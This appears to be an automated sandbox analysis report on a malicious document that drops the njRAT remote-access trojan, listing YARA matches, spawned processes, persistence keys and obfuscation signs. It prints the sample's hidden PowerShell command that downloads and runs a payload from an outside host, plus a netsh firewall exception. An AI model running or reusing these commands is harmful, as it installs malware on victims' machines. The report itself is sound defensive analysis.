Source: 10.0.exploit.exe.1d0000.0.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_c_RID2E71 date = 2018-02-08 11:14:41, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/, score = demo, minimum_yara = 1.7
Source: 10.0.exploit.exe.1d0000.0.unpack, type: UNPACKEDPEMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 10.0.exploit.exe.1d0000.0.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 16.2.dllhost.exe.210000.0.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_c_RID2E71 date = 2018-02-08 11:14:41, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/, score = demo, minimum_yara = 1.7
Source: 16.2.dllhost.exe.210000.0.unpack, type: UNPACKEDPEMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 16.2.dllhost.exe.210000.0.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 15.2.dllhost.exe.210000.0.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_c_RID2E71 date = 2018-02-08 11:14:41, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/, score = demo, minimum_yara = 1.7
Source: 15.2.dllhost.exe.210000.0.unpack, type: UNPACKEDPEMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 15.2.dllhost.exe.210000.0.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Classification labelShow sources
Source: classification engineClassification label: mal100.troj.adwa.spyw.expl.evad.winODT@19/16@43/1
Contains functionality to adjust token privileges (e.g. debug / backup)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_004CACEE AdjustTokenPrivileges,9_2_004CACEE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_004CACB7 AdjustTokenPrivileges,9_2_004CACB7
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeCode function: 11_2_005B14E6 AdjustTokenPrivileges,11_2_005B14E6
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeCode function: 11_2_005B14AF AdjustTokenPrivileges,11_2_005B14AF
Creates files inside the user directoryShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$toformLiscence bls activation.odtJump to behavior
Creates temporary filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRBBF3.tmpJump to behavior
Parts of this applications are using the .NET runtime (Probably coded in C#)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
Source: C:\Users\user\AppData\Local\Temp\exploit.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\exploit.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
Source: C:\Users\user\AppData\Local\Temp\exploit.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
Queries process information (via WMI, Win32_Process)Show sources
Source: C:\Windows\System32\mshta.exeWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Reads ini filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Reads software policiesShow sources
Source: C:\Windows\System32\verclsid.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Sample is known by AntivirusShow sources
Source: AutoformLiscence bls activation.odtVirustotal: Detection: 28%
Sample might require command line argumentsShow sources
Source: powershell.exeString found in binary or memory: The device has succeeded a query-stop and its resource requirements have changed.
Source: powershell.exeString found in binary or memory: The device's co-installer has additional work to perform after installation is complete.
Source: powershell.exeString found in binary or memory: The device's co-installer is invalid.
Source: powershell.exeString found in binary or memory: The components threading model has changed after install into a COM+ Application. Please re-install component.
Spawns processesShow sources
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknownProcess created: C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
Source: unknownProcess created: C:\Windows\System32\verclsid.exe 'C:\Windows\system32\verclsid.exe' /S /C {3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}
Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'C:\Users\user\AppData\Local\Temp\Exploit (2).hta'
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd.exe /c PowerShell.exe -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://1.top4top.net/p_1301n6ked1.jpg','%temp%\exploit.exe');Start-Process '%temp%\exploit.exe'
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell.exe -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://1.top4top.net/p_1301n6ked1.jpg','C:\Users\user\AppData\Local\Temp\exploit.exe');Start-Process 'C:\Users\user\AppData\Local\Temp\exploit.exe'
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\exploit.exe 'C:\Users\user\AppData\Local\Temp\exploit.exe'
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\dllhost.exe 'C:\Users\user\AppData\Local\Temp\dllhost.exe'
Source: unknownProcess created: C:\Windows\System32\netsh.exe netsh firewall add allowedprogram 'C:\Users\user\AppData\Local\Temp\dllhost.exe' 'dllhost.exe' ENABLE
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\dllhost.exe 'C:\Users\user\AppData\Local\Temp\dllhost.exe' ..
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\dllhost.exe 'C:\Users\user\AppData\Local\Temp\dllhost.exe' ..
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\verclsid.exe 'C:\Windows\system32\verclsid.exe' /S /C {3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'C:\Users\user\AppData\Local\Temp\Exploit (2).hta' Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell.exe -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://1.top4top.net/p_1301n6ked1.jpg','C:\Users\user\AppData\Local\Temp\exploit.exe');Start-Process 'C:\Users\user\AppData\Local\Temp\exploit.exe'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\exploit.exe 'C:\Users\user\AppData\Local\Temp\exploit.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\exploit.exeProcess created: C:\Users\user\AppData\Local\Temp\dllhost.exe 'C:\Users\user\AppData\Local\Temp\dllhost.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall add allowedprogram 'C:\Users\user\AppData\Local\Temp\dllhost.exe' 'dllhost.exe' ENABLEJump to behavior
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
Reads internet explorer settingsShow sources
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
Found graphical window changes (likely an installer)Show sources
Source: Window RecorderWindow detected: More than 3 window changes detected
Uses Microsoft SilverlightShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dllJump to behavior
Checks if Microsoft Office is installedShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
Uses new MSVCR DllsShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dllJump to behavior
Binary contains paths to debug symbolsShow sources
Source: Binary string: D:\office\Target\word\x86\ship\0\msword.PDB source: WINWORD.EXE, 00000000.00000002.738392363.04610000.00000002.00000001.sdmp

Data Obfuscation:

barindex
.NET source code contains potential unpackerShow sources
Source: exploit.exe.9.dr, OK.cs.Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: dllhost.exe.10.dr, OK.cs.Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 10.2.exploit.exe.1d0000.0.unpack, OK.cs.Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 10.0.exploit.exe.1d0000.0.unpack, OK.cs.Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: bde52a20d668d6f304b9db902c7cfc6b.exe.11.dr, OK.cs.Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 11.0.dllhost.exe.210000.0.unpack, OK.cs.Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 11.2.dllhost.exe.210000.0.unpack, OK.cs.Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 15.0.dllhost.exe.210000.0.unpack, OK.cs.Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 15.2.dllhost.exe.210000.0.unpack, OK.cs.Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 16.0.dllhost.exe.210000.0.unpack, OK.cs.Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 16.2.dllhost.exe.210000.0.unpack, OK.cs.Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Suspicious powershell command line foundShow sources
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell.exe -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://1.top4top.net/p_1301n6ked1.jpg','C:\Users\user\AppData\Local\Temp\exploit.exe');Start-Process 'C:\Users\user\AppData\Local\Temp\exploit.exe'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell.exe -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://1.top4top.net/p_1301n6ked1.jpg','C:\Users\user\AppData\Local\Temp\exploit.exe');Start-Process 'C:\Users\user\AppData\Local\Temp\exploit.exe'Jump to behavior
Uses code obfuscation techniques (call, push, ret)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_045C03BC push eax; mov dword ptr [esp], ecx9_2_045C03D4
Source: C:\Users\user\AppData\Local\Temp\exploit.exeCode function: 10_2_001D5021 push cs; ret 10_2_001D5022
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeCode function: 11_2_00215021 push cs; ret 11_2_00215022

Persistence and Installation Behavior:

barindex
Creates processes via WMIShow sources
Source: C:\Windows\System32\mshta.exeWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Tries to download and execute files (via powershell)Show sources
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell.exe -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://1.top4top.net/p_1301n6ked1.jpg','C:\Users\user\AppData\Local\Temp\exploit.exe');Start-Process 'C:\Users\user\AppData\Local\Temp\exploit.exe'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell.exe -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://1.top4top.net/p_1301n6ked1.jpg','C:\Users\user\AppData\Local\Temp\exploit.exe');Start-Process 'C:\Users\user\AppData\Local\Temp\exploit.exe'Jump to behavior
Drops PE filesShow sources
Source: C:\Users\user\AppData\Local\Temp\exploit.exeFile created: C:\Users\user\AppData\Local\Temp\dllhost.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bde52a20d668d6f304b9db902c7cfc6b.exeJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\exploit.exeJump to dropped file

Boot Survival:

barindex
Creates autostart registry keys with suspicious namesShow sources
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run bde52a20d668d6f304b9db902c7cfc6bJump to behavior
Drops PE files to the startup folderShow sources
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bde52a20d668d6f304b9db902c7cfc6b.exeJump to dropped file
Creates a start menu entry (Start Menu\Programs\Startup)Show sources
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bde52a20d668d6f304b9db902c7cfc6b.exeJump to behavior
Stores files to the Windows start menu directoryShow sources
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bde52a20d668d6f304b9db902c7cfc6b.exeJump to behavior
Creates an autostart registry keyShow sources
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run bde52a20d668d6f304b9db902c7cfc6bJump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run bde52a20d668d6f304b9db902c7cfc6bJump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run bde52a20d668d6f304b9db902c7cfc6bJump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run bde52a20d668d6f304b9db902c7cfc6bJump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\verclsid.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
